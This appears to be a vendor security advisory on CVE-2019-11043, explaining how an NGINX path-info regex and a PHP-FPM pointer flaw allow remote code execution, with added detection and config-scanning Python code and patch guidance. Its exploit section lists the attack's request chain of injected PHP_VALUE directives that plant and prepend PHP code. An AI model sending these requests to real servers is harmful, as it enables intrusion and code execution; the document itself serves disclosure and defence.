PHP-FPM Vulnerability leads to Remote code execution

November 4, 2019

PHP-FPM (FastCGI Process Manager) is a FastCGI handler for PHP scripts and applications, especially useful for busier sites. It is commonly paired with a web server that serves HTML, JavaScript and other non-PHP content itself while forwarding requests for PHP applications, such as web forums or login gateways, to PHP-FPM over the FastCGI protocol.

FastCGI is a way to let a CGI program execute time-consuming setup (such as opening a database connection) once, rather than on every request. It mainly reduces the overhead of interfacing between the web server and CGI programs, allowing a server to handle more page requests per unit of time.

Vulnerability | CVE-2019-11043
This vulnerability can be triggered only when NGINX is paired with PHP-FPM and the NGINX configuration has the following shape. It lets PHP-FPM write outside an allocated buffer, into the memory holding the FastCGI protocol data of the request, which opens the possibility of remote code execution.

location ~ [^/]\.php(/|$) {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass php:9000;
    …

The regular expression in the `fastcgi_split_path_info` directive can be broken with a newline character (%0a in URL-encoded form), because `.` does not match a newline. When the regex fails to match, NGINX sets $fastcgi_path_info to an empty string, so PHP-FPM receives an empty PATH_INFO even though the URI carries a suffix after the script name. While handling that empty PATH_INFO, php-fpm has a logical flaw in its pointer arithmetic that lets the attacker corrupt the FastCGI environment of the request, so that a "PHP_VALUE" string placed in the request path is treated as the PHP_VALUE FastCGI variable, which PHP honours as a php.ini override. By repeating this with carefully chosen config values, attackers build a chain of settings that yields remote code execution.
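To make the first step concrete, the following added example (written for this page, not code from the original post or from SonicWall) emulates what the snippet above does with a request path: it applies the same fastcgi_split_path_info regex, reproduces NGINX's behaviour on a miss, and builds the params PHP-FPM would receive. SCRIPT_FILENAME is assumed to be $document_root$fastcgi_script_name with an assumed document root of /var/www/html, since the snippet elides that line; breaks_split_regex is a hypothetical request check for logging or WAF use, not part of any product.

```python
import re
from urllib.parse import unquote

# The regex from the vulnerable nginx snippet, unchanged. nginx hands it to
# PCRE; neither PCRE nor Python's re lets "." match a newline by default, so
# the two engines agree on the inputs that matter here.
SPLIT_RE = re.compile(r"^(.+?\.php)(/.*)$")

# Assumed document root; the page's snippet elides SCRIPT_FILENAME, so the
# usual "$document_root$fastcgi_script_name" is assumed below.
DOCUMENT_ROOT = "/var/www/html"


def split_path_info(uri):
    """Emulate fastcgi_split_path_info on an already URL-decoded URI.

    Returns (fastcgi_script_name, fastcgi_path_info). When the regex does not
    match, nginx keeps the whole URI as $fastcgi_script_name and leaves
    $fastcgi_path_info empty.
    """
    m = SPLIT_RE.match(uri)
    if m is None:
        return uri, ""
    return m.group(1), m.group(2)


def fastcgi_params(raw_path):
    """Build the FastCGI params the snippet would send to php-fpm for a raw
    request path (URL-decoded first, as nginx does before matching)."""
    uri = unquote(raw_path)
    script_name, path_info = split_path_info(uri)
    return {
        "SCRIPT_FILENAME": DOCUMENT_ROOT + script_name,
        "SCRIPT_NAME": script_name,
        "PATH_INFO": path_info,
    }


def breaks_split_regex(raw_path):
    """True when a request carries a suffix after ".php/" (so a legitimate
    PATH_INFO would be non-empty) yet the regex yields an empty PATH_INFO.
    That combination is the precondition CVE-2019-11043 needs."""
    uri = unquote(raw_path)
    if ".php/" not in uri:
        return False
    return split_path_info(uri)[1] == ""


if __name__ == "__main__":
    for path in ("/index.php/some/path",
                 "/index.php/PHP_VALUE%0Asession.auto_start=0;;;;"):
        print(path, "->", fastcgi_params(path),
              "breaks regex:", breaks_split_regex(path))
```

Run directly, it prints both cases: the ordinary /index.php/some/path splits cleanly, while the %0A request reaches php-fpm with SCRIPT_FILENAME containing the whole tail of the URI and PATH_INFO empty, which is the state the rest of the exploit builds on.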

Exploit:

The attacker's requests look like the ones below. Each one carries a forged PHP_VALUE that sets a single php.ini directive, and the runs of trailing semicolons are padding that keeps each request at the length the exploit needs. Together the directives route PHP's error log to /tmp/a, get an error message containing PHP code written into it (the last two requests, truncated here, set extension_dir and extension to values that embed that code), and then make php-fpm prepend that file to every script it runs via include_path=/tmp and auto_prepend_file=a:

GET /index.php/PHP_VALUE%0Asession.auto_start=0;;;;
GET /index.php/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;;
GET /index.php/PHP_VALUE%0Ainclude_path=/tmp;;;;;;
GET /index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;
GET /index.php/PHP_VALUE%0Alog_errors=1;;;;;;;;;;;
GET /index.php/PHP_VALUE%0Aerror_reporting=2;;;;;;
GET /index.php/PHP_VALUE%0Aerror_log=/tmp/a;;;;;;;
GET /index.php/PHP_VALUE%0Aextension_dir=%22%3C%3F
GET /index.php/PHP_VALUE%0Aextension=%22$_GET%5Ba%

Fix:

Admins are advised to check whether their NGINX configuration has the affected shape by executing a simple command:
                  egrep -Rin --color 'fastcgi_split_path' /etc/nginx/

A hit only shows that the directive is in use. Exposure additionally requires that the location block hands the request to an unpatched PHP-FPM without a file-existence check such as try_files $fastcgi_script_name =404, which rejects a URI like /index.php/PHP_VALUE%0A... because no such file exists on disk.
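The grep above finds the directive but says nothing about the rest of the location block. The following added example (written for this page, not code from the original post or from SonicWall) parses NGINX configuration text and reports, per location, whether it combines fastcgi_split_path_info, a PATH_INFO param and fastcgi_pass without a try_files ... =404 guard. SAMPLE_CONF is a constructed config for the demonstration, and the "=404" test is a heuristic: it assumes the guarded path is the script name or URI, which is the form NGINX documentation recommends.

```python
import re
import sys

# Constructed sample config (not from the page): the first location is the
# shape the advisory shows; the second adds the file-existence guard.
SAMPLE_CONF = r"""
server {
    listen 80;
    root /var/www/html;
    location ~ [^/]\.php(/|$) {
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_pass php:9000;        # vulnerable shape
        include fastcgi_params;
    }
}
server {
    listen 8080;
    root /var/www/app;
    location ~ [^/]\.php(/|$) {
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        try_files $fastcgi_script_name =404;   # rejects URIs that are not a real file
        fastcgi_pass unix:/run/php/php-fpm.sock;
        include fastcgi_params;
    }
    location /static/ {
        root /var/www/static;
    }
}
"""


def strip_comments(text):
    """Remove '#' comments so commented-out directives do not count."""
    return re.sub(r"#[^\n]*", "", text)


def location_blocks(text):
    """Yield (header, body) for each location block, matching braces by hand
    so nested blocks inside a location stay part of its body."""
    text = strip_comments(text)
    for m in re.finditer(r"location\s+[^{]*\{", text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(0).strip(), text[m.end():i - 1]


def assess(text):
    """Classify every location that proxies to FastCGI.

    'exposed' : fastcgi_split_path_info + fastcgi_param PATH_INFO, no guard
    'guarded' : same directives, but a try_files ... =404 guard is present
    'other'   : passes to FastCGI without handing over a split PATH_INFO
    Returns a list of (location_header, status).
    """
    findings = []
    for header, body in location_blocks(text):
        if "fastcgi_pass" not in body:
            continue
        splits = "fastcgi_split_path_info" in body
        passes = re.search(r"fastcgi_param\s+PATH_INFO\s", body) is not None
        if not (splits and passes):
            findings.append((header, "other"))
            continue
        # Heuristic: a try_files ending in =404 makes nginx answer 404 when the
        # checked path (normally $fastcgi_script_name or $uri) is not a file.
        guarded = re.search(r"try_files\s+[^;]*=404\s*;", body) is not None
        findings.append((header, "guarded" if guarded else "exposed"))
    return findings


if __name__ == "__main__":
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONF
    for header, status in assess(conf):
        print(f"{status:8} {header}")
```

Pass a real file (for example /etc/nginx/nginx.conf after concatenating its includes) as the first argument to scan it; with no argument it scans the constructed sample and reports the first location as exposed and the second as guarded.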

It is recommended to upgrade to the patched release of your PHP branch (PHP 7.1.33, 7.2.24 or 7.3.11) or later.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

          IPS 14523: PHP-FPM NGINX Remote Code Execution

SonicWall WAF has been designed to provide protection against this exploit by default.